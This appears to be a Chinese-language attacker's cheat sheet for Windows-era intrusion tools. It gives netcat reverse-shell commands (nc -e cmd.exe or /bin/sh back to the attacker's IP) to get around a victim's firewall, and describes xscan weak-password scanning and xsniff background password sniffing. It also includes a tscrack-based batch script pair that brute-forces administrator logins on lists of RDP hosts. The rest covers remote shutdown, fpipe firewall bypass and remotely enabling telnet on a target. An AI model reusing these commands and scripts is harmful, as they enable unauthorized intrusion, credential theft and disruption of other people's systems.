<p>　　nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止</p>

<p>　　nc -L -p 80 &gt; c:log.txt 作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:log.txt</p>

<p>　　nc -L -p 80 &lt; c:honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:honeyport.txt中内容送入管道中，亦可起到传送文件作用</p>

<p>　　type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用</p>

<p>　　本机上用：nc -l -p 本机端口</p>

<p>　　在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K</p>

<p>　　nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙</p>

<p>　　本机上用：nc -d -l -p 本机端口 &lt; 要传送的文件路径及名称</p>

<p>　　在对方主机上用：nc -vv 本机IP 本机端口 &gt; 存放文件的路径及名称 传送文件到对方主机</p>

<p>　　备 注：</p>

<p>　　| 管道命令</p>

<p>　　&lt; 或 &gt; 重定向命令。&ldquo;&lt;&rdquo;，例如：tlntadmn &lt; test.txt 指把test.txt的内容赋值给tlntadmn命令</p>

<p>　　@ 表示执行@后面的命令，但不会显示出来（后台执行）；例：@dir c:winnt &gt;&gt; d:log.txt 意思是：后台执行dir，并把结果存在d:log.txt中</p>

<p>　　&gt;与&gt;&gt;的区别 &quot;&gt;&quot;指：覆盖；&quot;&gt;&gt;&quot;指：保存到(添加到）。</p>

<p>　　如：@dir c:winnt &gt;&gt; d:log.txt和@dir c:winnt &gt; d:log.txt二个命令分别执行二次比较看：用&gt;&gt;的则是把二次的结果都保存了，而用：&gt;则只有一次的结果，是因为第二次的结果把第一次的覆盖了。</p>

<h3>扫描工具：xscan.exe</h3>

<p>　　基本格式</p>

<p>　　xscan -host &lt;起始IP&gt;[-&lt;终止IP&gt;] &lt;检测项目&gt; [其他选项] 扫锚&quot;起始IP到终止IP&quot;段的所有主机信息</p>

<p>　　xscan -file &lt;主机列表文件名&gt; &lt;检测项目&gt; [其他选项] 扫锚&quot;主机IP列表文件名&quot;中的所有主机信息</p>

<p>　　检测项目</p>

<p>　　-active 检测主机是否存活</p>

<p>　　-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）</p>

<p>　　-port 检测常用服务的端口状态</p>

<p>　　-ftp 检测FTP弱口令</p>

<p>　　-pub 检测FTP服务匿名用户写权限</p>

<p>　　-pop3 检测POP3-Server弱口令</p>

<p>　　-smtp 检测SMTP-Server漏洞</p>

<p>　　-sql 检测SQL-Server弱口令</p>

<p>　　-smb 检测NT-Server弱口令</p>

<p>　　-iis 检测IIS编码/解码漏洞</p>

<p>　　-cgi 检测CGI漏洞</p>

<p>　　-nasl 加载Nessus攻击脚本</p>

<p>　　-all 检测以上所有项目</p>

<p>　　其它选项</p>

<p>　　-i 适配器编号 设置网络适配器, &lt;适配器编号&gt;可通过&quot;-l&quot;参数获取</p>

<p>　　-l 显示所有网络适配器</p>

<p>　　-v 显示详细扫描进度</p>

<p>　　-p 跳过没有响应的主机</p>

<p>　　-o 跳过没有检测到开放端口的主机</p>

<p>　　-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10</p>

<p>　　-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)</p>

<p>　　用法示例</p>

<p>　　xscan -host 192.168.1.1-192.168.255.255 -all -active -p　检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机</p>

<p>　　xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大并发线程数量为150，跳过没有检测到开放端口的主机</p>

<p>　　xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测&ldquo;hostlist.txt&rdquo;文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机</p>

<h3>命令行方式嗅探器: xsniff.exe</h3>

<p>　　可捕获局域网内FTP/SMTP/POP3/HTTP协议密码</p>

<p>　　参数说明</p>

<p>　　-tcp 输出TCP数据报</p>

<p>　　-udp 输出UDP数据报</p>

<p>　　-icmp 输出ICMP数据报</p>

<p>　　-pass 过滤密码信息</p>

<p>　　-hide 后台运行</p>

<p>　　-host 解析主机名</p>

<p>　　-addr IP地址 过滤IP地址</p>

<p>　　-port 端口 过滤端口</p>

<p>　　-log 文件名 将输出保存到文件</p>

<p>　　-asc 以ASCII形式输出</p>

<p>　　-hex 以16进制形式输出</p>

<p>　　用法示例</p>

<p>　　xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中</p>

<p>　　xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出</p>

<p>　　终端服务密码破解: tscrack.exe</p>

<p>　　参数说明</p>

<p>　　-h 显示使用帮助</p>

<p>　　-v 显示版本信息</p>

<p>　　-s 在屏幕上打出解密能力</p>

<p>　　-b 密码错误时发出的声音</p>

<p>　　-t 同是发出多个连接（多线程）</p>

<p>　　-N Prevent System Log entries on targeted server</p>

<p>　　-U 卸载移除tscrack组件</p>

<p>　　-f 使用－f后面的密码</p>

<p>　　-F 间隔时间（频率）</p>

<p>　　-l 使用－l后面的用户名</p>

<p>　　-w 使用－w后面的密码字典</p>

<p>　　-p 使用－p后面的密码</p>

<p>　　-D 登录主页面</p>

<p>　　用法示例</p>

<p>　　tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码</p>

<p>　　tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户</p>

<p>　　@if not exist ipcscan.txt goto noscan</p>

<p>　　@for /f &quot;tokens=1 delims= &quot; %%i in (3389.txt) do call hack.bat %%i</p>

<p>　　nscan</p>

<p>　　@echo 3389.txt no find or scan faild</p>

<p>　　(①存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)</p>

<p>　　3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat</p>

<p>　　@if not exist tscrack.exe goto noscan</p>

<p>　　@tscrack %1 -l administrator -w pass.dic &gt;&gt;rouji.txt</p>

<p>　　:noscan</p>

<p>　　@echo tscrack.exe no find or scan faild</p>

<p>　　(②存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下；就可以等待结果了)</p>

<p>　　hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码，并将破解结果保存在rouji.txt文件中。</p>

<p>　　其它</p>

<p>　　Shutdown.exe</p>

<p>　　Shutdown IP地址 t:20 20秒后将对方NT自动关闭（Windows 2003系统自带工具，在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。）</p>

<p>　　fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明（端口重定向绕过防火墙）</p>

<p>　　fpipe -l 80 -s 1029 -r 80 当有人扫锚你的80端口时，他扫到的结果会完全是的主机信息</p>

<p>　　Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后，就通过88端口发送到目标IP的23端口。（与目标IP建立Telnet时本机就用的88端口与其相连接）然后：直接Telnet 127.0.0.1（本机IP）就连接到目标IP的23端口了。</p>

<p>　　OpenTelnet.exe (远程开启telnet工具)</p>

<p>　　opentelnet.exe IP 帐号　密码　ntlm认证方式　Telnet端口 （不需要上传ntlm.exe破坏微软的身份验证方式）直接远程开启对方的telnet服务后，就可用telnet ip 连接上对方。</p>

<p>　　NTLM认证方式：0：不使用NTLM身份验证；1：先尝试NTLM身份验证，如果失败，再使用用户名和密码；2：只使用NTLM身份验证。</p>

<p>　　ResumeTelnet.exe (OpenTelnet附带的另一个工具)</p>

<p>　　resumetelnet.exe IP　帐号　密码 用Telnet连接完对方后，就用这个命令将对方的Telnet设置还原，并同时关闭Telnet服务。</p>
